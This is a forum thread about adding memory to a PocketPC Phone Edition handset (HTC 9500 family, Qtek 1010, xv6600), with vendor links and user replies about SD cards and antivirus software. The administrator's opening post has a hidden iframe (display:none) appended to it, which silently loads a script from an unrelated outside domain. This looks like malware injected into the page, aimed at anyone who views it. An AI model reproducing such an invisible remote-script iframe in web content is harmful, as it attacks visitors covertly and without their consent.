+ Reply to Thread
    Editor and Site Administrator Convergent's Avatar

Can I add more memory to my phone?

You can add more memory to your phone, but it is not an approved method by the manufacturer, so it will void your warranty. But, the company, <a class="postlink" target="_blank" href="http://www.pocketpctechs.com/XDAup.asp?REFERER=pdaphonehome">PocketPC Techs (pdaPhoneHome Users get a 10% Discount.... see pdaPhoneHome Store for Details)</a>, that does the upgrade has a history of great customer service and quality work. There are 64M and 128M upgrades available. Only 64M is directly addressable, so if you get the 128M upgrade, the second 64M becomes a very fast VDISK. This is like having a fast, permanent SD card in the machine, but also having your SD slot available. Most people install most of their applications to the SD card, so this effects the speed of the machine in terms of launching those applications.

How does this memory upgrade affect the battery life of the Phone Edition? Good question... here is the detailed answer from our friends at The Gadgeteers.

If you live in Hong Kong (HK), then <a class="postlink" target="_blank" href="http://www.palm-center.com/htm/upgrade.htm">PalmCenter.com</a> has a 64M upgrade available. We have not heard any reports on the quality of this company's upgrades... if anyone has feedback, please add it in a reply.

Alternatively, many users are able to get by with the standard 32M by carefully watching their available RAM, and by moving many of their applications to an SD card. If you choose this route, it is recommended that you get a large SD card, since it will become a permanent fixture in your phone. Once you've installed applications on the card, you will not be able to run the applications if you remove it.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Mike - Been Converged?

Updated

Included info on discount.
    Mike - Been Converged?

mav
    Do you know if it's working for the Qtek 1010 as well ? It seems that it's the same phone with a different name.....

Let me know if you know.

Thanks

Should work

This upgrade should work with any phone in the HTC 9500 family. I believe the QTek 1010 fits that category. To be sure, you should mention this to Pocket PC Techs when you place the order. Visit the pdaPhoneHome store to receive a discount on this upgrade.
    Mike - Been Converged?

SAN Disk 256MB SD card with T-Mobile Pocket PC PE

I bourght a SAN Disk 256MB Secure Digital card for $64 at Costco two weeks ago, and everything runs perfectly. Also all programs that i have installed and run from the card.

TMJ
    Mr. TMJ

question about memory upgrade

I just added airscanner mobile antivirus and firewall software to my Verizon xv6600. Does anyone know if these would run well from an SD card? The two programs are really slowing down the functioning of my ppc. I got the antivirus scanner and the firewall together for $41 so I had a hard time saying no to that when separately they each cost $30.

Also, I use the internet connection on my ppc/pda phone a lot. Is the firewall software really necessary or did I get too caught up in the fact that this is a windows based device?

Lastly, I know that my phone is very new but is any company out there working on a internal memory upgrade for the xv6600? I would love to double or quadruple the internal memory. I checked the ppctech website and it didn't mention anything about them working on an upgrade for the xv6600 yet.
    Last edited by bigbearsfan; 10-05-2005 at 03:41 PM.